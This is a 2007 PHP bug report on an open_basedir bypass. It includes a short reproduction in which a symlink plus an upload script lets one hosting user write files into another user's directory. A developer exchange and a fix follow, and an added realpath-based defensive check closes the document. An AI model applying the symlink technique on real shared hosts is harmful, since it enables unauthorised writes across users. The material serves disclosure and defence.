Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Submitted: 2007-03-27 18:30 UTC Modified: 2007-04-10 22:31 UTC
From: vladimir at petrov dot ks dot ua Assigned: tony2001
Status: Closed Package: Safe Mode/open_basedir
PHP Version: 5.2.1 OS: Linux
Private report: No CVE-ID:
 [2007-03-27 18:30 UTC] vladimir at petrov dot ks dot ua
A user can bypass the open_basedir restriction with move_uploaded_file() if the target file path is a symlink to any directory.

Reproduce code:
user1 will upload a file to user2's /home/user2/public_html folder.

We have in /etc/passwd:

The target folder is writable by anybody:
# ls -lA /home/user2
drwxrwxrwx  2 user2 user2 4096 Mar 27 17:31 public_html/

Apache has mod_php installed. Apache config for user1:
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"

User user1 can do something like:

$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>
<?php
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
         echo "ok";
    else echo "failed";
}
?>
<form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</form>
</body></html>' > upload.php

Expected result:
If we access after file upload expected message "Upload failed" and no file in target folder.

Actual result:
If we access after file upload we got message "Upload ok" and file well exist in target folder.

 [2007-03-27 18:40 UTC]
Make sure the open_basedir option is actually used and not overridden in another way.
 [2007-03-27 19:59 UTC] vladimir at petrov dot ks dot ua
open_basedir actually used.
If I try to write directly to target directory by


I got proper error message in browser and in the apache error log.
 [2007-03-27 20:33 UTC]
Cannot reproduce.
 [2007-03-27 21:19 UTC] vladimir at petrov dot ks dot ua
I have sent access information to my server to
I see this bug really working.
 [2007-04-10 22:31 UTC]
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
Thank you for the report, and for helping us make PHP better.
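
Added example, not part of the original report or of the PHP source: an application-level check that resolves the destination directory with realpath() and refuses a target whose real location falls outside the allowed base, run here against a constructed copy of the directory layout from the report. The helper name safe_destination() and the temporary paths are assumptions made for the illustration.

```php
<?php
// Added example: resolve the destination before writing and refuse it when
// the real path leaves the allowed base. safe_destination() is hypothetical.
function safe_destination(string $base, string $target): ?string
{
    $realBase = realpath($base);
    // The file itself may not exist yet, so resolve its parent directory.
    $realDir = realpath(dirname($target));
    if ($realBase === false || $realDir === false) {
        return null;
    }
    // Trailing separator so that /home/user1 does not match /home/user10.
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($realDir . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $final = $realDir . DIRECTORY_SEPARATOR . basename($target);
    // An existing symlink as the last component would redirect the write too.
    return is_link($final) ? null : $final;
}

// Constructed layout mirroring the report: user1's tree holds a symlink
// that points into user2's directory.
$root  = sys_get_temp_dir() . '/bug40931_' . getmypid();
$user1 = "$root/user1/public_html";
$user2 = "$root/user2/public_html";
mkdir($user1, 0777, true);
mkdir($user2, 0777, true);
symlink($user2, "$user1/user2_public_html");

$base = "$root/user1";
foreach (["$user1/file.ext", "$user1/user2_public_html/file.ext"] as $requested) {
    $dest = safe_destination($base, $requested);
    // Only a non-null $dest would be handed to move_uploaded_file().
    echo $requested, ' => ', $dest === null ? 'rejected' : 'allowed', "\n";
}

// Remove the constructed layout again.
unlink("$user1/user2_public_html");
foreach ([$user1, $user2, "$root/user1", "$root/user2", $root] as $dir) {
    rmdir($dir);
}
```

The check and the later write are two separate steps, so a directory that other users can modify in between can still be swapped for a symlink; treat this as defense in depth alongside the interpreter-level open_basedir check, not a replacement for it.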
